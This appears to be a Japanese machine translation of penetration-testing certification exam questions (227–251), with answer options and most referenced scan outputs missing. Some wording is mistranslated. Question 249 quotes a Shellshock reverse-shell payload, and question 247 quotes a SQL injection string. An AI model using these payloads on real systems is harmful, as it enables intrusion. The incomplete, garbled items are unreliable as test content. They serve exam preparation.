質問227
発見された脆弱性と、それらが影響を受けるシステムまたはネットワークに与える全体的な脅威を、正規化され標準化された表現で提供することを目的とした侵入テストレポートの要素は、次のうちどれですか？

質問228
ある侵入テスト実施者が、新しいクライアントとスコープ文書の作成に取り組んでいる。クライアントが使用する方法論には、次のようなものがある：
エンゲージメント前の対話（スコーピングとROE）
情報収集（偵察）
脅威のモデリング
脆弱性分析
搾取と搾取後
報告
クライアントが使用している方法論は次のうちどれですか？

質問229
あなたは侵入テスト担当者で、サーバーのポートスキャンを実行している。
インストラクション
パート1：出力が与えられたら、利用可能なオプションから、この出力を生成するために使用されたコマンドを構築する。
パート2：コマンドが適切に構築されたら、与えられた出力を使って、さらに調査すべき潜在的な攻撃ベクトルを特定する。
シミュレーションの初期状態に戻したい場合は、Reset Allボタンをクリックしてください。

質問230
ある侵入テスト実施者が、物理的な入退室管理システムで使用される特殊なTCPサービスを介して、攻撃者がドアを開けることを可能にする脆弱性を探している。このサービスは 100 以上の異なるホストに存在するので、テスト者は評価を自動化したい。そのため、テスト者は評価を自動化したいと考えています：
完全なTCP接続
ハロー」ペイロードの送信
ウォルトからの回答
16バイト以上の文字列を送信する
その目的を達成するために、最も効果的なアプローチはどれか？

質問231
ある侵入テスト実施者が、ウェブアプリケーションの評価のために偵察を実施しています。調査の際、テスト者は robots.txt ファイルを調べ、関心のある項目を探します。
インストラクション
ペネトレーション・テスターがさらなる調査のために使用すべきツールを選択する。
robots.txtファイルの中から、ペネトレーション・テスターが削除を推奨する2つのエントリーを選択する。

質問232
侵入テスト実施者は、ターゲットとFTPプロトコルを持つサーバーの間にオンパス攻撃としてワークステーションを配置することで、FTP認証情報を取得したいと考えている。この目的を達成するための最良の方法はどれか。

質問233
侵入テスト実施者は、Nmapスキャンから次のような結果を受け取った：

ターゲットが稼働している可能性が最も高いOSはどれか？

質問234
ある侵入テスト実施者が、あるクライアントのために、会社の業務に最小限の混乱しか与えないような活動を行う準備をしています。次のうち、受動的な偵察ツールと考えられるものはどれですか。(2つ選びなさい)

質問235
ある侵入テスト実施者が、低特権のリバースシェルを取得した後、次のコマンドを実行した：wmic service get name,pathname,startmode 侵入テスト実施者がこのコマンドを実行した理由として、最も可能性が高いものはどれか。

質問236
次の出力は、一般に公開されている銀行のウェブサイトを偵察したものである：

これらの結果から、次のうち最も成功する可能性が高い攻撃はどれか？

質問237
侵入テスト担当者がNmapを使ってホスト64.13.134.52をスキャンし、次のような結果を得た：

このアウトプットに基づき、次のうち最も悪用されそうなサービスはどれか？(2つ選んでください)

質問238
Nmapスキャンの結果は以下の通り：

この装置に関する結論として、最も適切なものはどれか？

質問239
ウェブアプリケーションテストを実施している侵入テスト実施者が、財務データへのログインページに関連するクリックジャッ キング脆弱性を発見しました。この悪用を成功させるために、テスト者はこの情報を使って次のうちどれを行うべきですか？

質問 240
侵入テスト担当者が、複数のスレッドを使用してSSH経由でユーザーパスワードを総当たりで入力するために使用できるツールは、次のうちどれですか？

質問241
侵入テスト実施者は、Nmapスキャンから次のような結果を受け取った：

ターゲットが稼働している可能性が最も高いOSはどれか？

質問242
侵入テスト実施者は、ドメイン内のどのアカウントもロックせずに、そのアカウントのパスワードを見つけたい。テスト者は次のコマンドのどれを使うべきか。

質問243
一般的なITサーバーと産業用制御システムを含むハイブリッド・ネットワーク・セグメントで脆弱性スキャナーを実行する：

質問244
あるペネトレーション・テスターが、近々行われるペネトレーション・テストのために、次のようなフィッシング・メールを用意した：

ペネトレーション・テスターがフィッシング・ターゲットにリンクをクリックさせるために最も利用しているのはどれか？

質問245
ある侵入テスト実施者が、電気自動車を制御するキーフォブを制御するために、オンパスリンクレイヤー攻撃を実施している。次の無線攻撃のうち、侵入テスト者が攻撃を成功させることができるのはどれか。

質問246
システムに侵入した後、侵入テスト者は次に取るべき行動を決定するためにより多くの情報を欲しがる。テスト者は次のコマンドを実行する：

ペネトレーション・テスターが実行しようとしている可能性が最も高い攻撃はどれか。

質問247
ある侵入テスト実施者が、あるウェブ・サーバのアセスメントを実施した。このセッションのログを見ると、以下のようになっている：
http://www.thecompanydomain.com/servicestatus.php?serviceID=892&serviceID=892 ' ;ドロップテーブルサービス; -
次のうち、どの攻撃が試みられているか？

質問248
評価中に、侵入テスト実施者が、Aircrack-ng を実行しているラップトップを使用して、建物の外から組織のワイヤレスネットワークにアクセスすることができました。この問題を修復するために、次のうちどれをクライアントに推奨すべきか？

質問249
ある侵入テスト実施者が、10.10.1.1 にある脆弱なウェブサーバを発見した。そしてテスト者は、Webエクスプロイトを送信するPythonスクリプトを編集し、以下のコードに出くわした：
exploits = {"User-Agent"："() { 無視;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept"：「text/html,application/xhtml+xml,application/xml"}。サーバーが実行されているユーザーコンテキストを決定するために、テスターがスクリプトに加えるべき編集は、次のうちどれですか？

質問250
ある侵入テスト実施者が、侵入テストの偵察フェーズで、公開されているデータ侵害のパスワードを発見しました。テスト実施者が取るべき行動として最も適切なものはどれか。

質問251
あなたはペネトレーション・テスターで、ウェブ・ブラウザを使ってクライアントのウェブサイトをレビューしている。
インストラクション
ブラウザを通してウェブサイトのすべてのコンポーネントを確認し、脆弱性が存在するかどうかを判断する。
証明書、ソース、クッキーのいずれかから、最も高い脆弱性のみを修復する。
シミュレーションの初期状態に戻したい場合は、Reset Allボタンをクリックしてください。